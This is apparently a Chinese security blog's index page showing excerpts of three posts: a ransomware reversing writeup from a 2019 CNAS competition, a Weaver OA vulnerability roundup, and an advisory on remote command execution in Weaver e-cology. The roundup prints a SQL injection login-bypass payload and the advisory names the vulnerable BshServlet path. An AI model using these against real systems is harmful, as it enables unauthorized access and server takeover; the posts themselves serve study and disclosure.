刘功瑞的博客
有一天你突然惊醒,发现这一切,都只不过是一场梦。
2020年04月05日
2019CNAS能力验证攻防比赛 第三题 恶意代码和垃圾邮件防范 writeup(sql注入,逆向)
去年能力验证的题,当时对逆向了解不多,所以没做出来,但是一直记着这个事情,今年学了逆向后,又把这题找出来做了几次,都没做出来,今天有了灵感终于做出来了!!!下图是我当时比赛完后写的writeup,链接http://www.liugongrui.com/?id=113附件下载下来解压里面有两个文件使用ida打开lesuo.exe,结合实际运行情况,可以看出lesuo.exe执行后会在d盘下生成一个rsa.exe剩下的加密工作都是由rsa.exe完成,所以使用ida打开rsa.exe,查看字符串窗口
作者:admin , 分类:逆向 , 浏览:533 , 评论:0
2020年04月05日
泛微OA漏洞汇总
SQL注入前台SQL注入用户名:admin' or password like 'c4ca4238a0b923820dcc509a6f75849b' and 'a'='a密码: 1验证页面参数 - loginid(1)/login/VerifyLogin.jsp?loginfile=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.jsp%3FtemplateId%3D41%26logintype%3D1%
作者:admin , 分类:渗透测试 , 浏览:541 , 评论:0
2020年04月05日
泛微OA系统多版本存在命令执行漏洞
0x01漏洞描述泛微OA办公系统是一款协调办公软件。泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。0x02漏洞危害攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行。0x03影响范围泛微 e-cology<=9.00x04漏洞复现访问 http://url/weaver/bsh.servlet.BshServlet 输入 payload 如下:
作者:admin , 分类:渗透测试 , 浏览:517 , 评论:0
- 搜索
- 文章归档
- 友情链接
-
